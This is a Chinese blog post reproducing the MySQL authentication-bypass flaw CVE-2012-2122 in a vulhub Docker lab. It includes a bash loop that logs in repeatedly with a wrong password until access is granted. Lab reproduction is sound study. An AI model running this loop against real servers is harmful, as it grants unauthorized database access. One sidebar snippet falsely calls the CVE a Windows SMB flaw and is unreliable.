msyql CVE-2012-2122漏洞复现

最新推荐文章于 2024-05-11 21:11:51 发布
最新推荐文章于 2024-05-11 21:11:51 发布
阅读量392 收藏 1
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/116274059
版权

搭建

进入vulhub对应mysql漏洞环境,执行如下命令即可

docker-compose up -d

在这里插入图片描述
如上则启动成功
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

漏洞复现

在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
最低0.47元/天 解锁文章
. iDea.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675。CVE(Common Vulnerabilities and Exposures)是用于识别已知安全漏洞的全球唯一标识符,有助于跟踪和管理这些漏洞。 ...
数据库安全:MySQL 身份认证漏洞CVE-2012-2122
网络安全领域___专研者.
11-10 739
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授权的方式进行访问 MySQL 数据库。
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4676
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
MySQL 身份认证漏洞 CVE-2012-2122
MateSnake的博客
05-11 375
MySQL 身份认证漏洞复现 CVE-2012-2122
Mysql 身份认证绕过漏洞CVE-2012-2122
m0_63521991的博客
10-19 824
CVE-2012-2122MySQL 数据库中的一个身份认证绕过漏洞,也被称为 "MySQL Authentication Bypass" 漏洞。该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,使得攻击者可以绕过身份认证并以未经授权的方式访问数据库。
MySql-身份认证绕过-CVE-2012-2122
m0_57206390的博客
10-27 327
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现
ran的博客
05-05 3167
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1346
mysql身份认证绕过漏洞复现CVE-2012-2122
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Mysql-CVE-2012-2122漏洞&Redis漏洞
weixin_54882883的博客
07-20 418
这个漏洞呢现在还存在而且网上留意的话还能找到挺多的。这漏洞主要是6379端口他默认不设置密码导致的。Mysql-CVE-2012-2122漏洞
复现 CVE2012-2122漏洞 ,用两种攻击方式复现
weixin_64655821的博客
08-26 956
复现 CVE2012-2122漏洞 ,用两种攻击方式复现 复现mysql 备份上传木马,并用shell工具连接操作
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 2865
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2299
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Mysql身份认证漏洞及利用(CVE-2012-2122)
qq_50854662的博客
03-01 2504
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB version
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
qq_63101755的博客
07-18 144
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
cve-2012-2122
最新发布
06-14
CVE-2012-2122是一个知名的计算机安全漏洞,它影响了Microsoft Windows操作系统中的远程代码执行功能。这个漏洞通常被称为“MS12-020”或“Windows SMBGhost”,漏洞存在于Server Message Block (SMB) 协议的某些...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值